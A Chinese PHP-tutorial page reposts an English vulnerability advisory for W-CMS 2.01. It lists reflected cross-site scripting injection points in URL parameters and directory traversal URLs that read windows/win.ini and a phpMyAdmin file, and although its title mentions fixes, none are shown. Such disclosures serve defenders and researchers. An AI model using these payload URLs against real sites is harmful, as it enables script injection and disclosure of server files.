网站地图    收藏   

主页 > 后端 > 网站安全 >

w-CMS 2.01多个缺陷及修复 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 标题: W-Cms Multiple Vulnerability作者: th3.g4m3_0v3r开发这网站:http://w-cms.info/下载地址: http://code.google.com/p/wcms/影响版本: [2.01]测试平台: Window 7W-CMS cross site scripting___......

标题: W-Cms Multiple Vulnerability
作者: th3.g4m3_0v3r
开发这网站:http://w-cms.info/
下载地址: http://code.google.com/p/wcms/
影响版本: [2.01]
测试平台: Window 7
 
W-CMS cross site scripting
_______________
 
缺陷连接__________\/_____________________
_______________
 
http://www.2cto.com /index.php?bid=1&COMMENT=1 "XSS"
http://www.2cto.com /?p=3"XSS"
http://www.2cto.com /?bid=5&p=1"XSS"
 
 
http://www.2cto.com /?p=3<FORM action="Default.asp?PageId=-1"
method=POST id=searchFORMname=searchFORM
  style="margin:0;padding:0"><INPUT type="hidden" value=""
name="txtSEARCH"></FORM>
 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
directory traversal attacks
 
This script is possibly vulnerable to directory traversal attacks
 
http://www.2cto.com /wcms-2.01_2/?p=../../../../../../../../../../windows/win.ini
http://www.2cto.com /wcms-2.01_2/?p=../../../../../phpMyAdmin/db_create.php
 
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论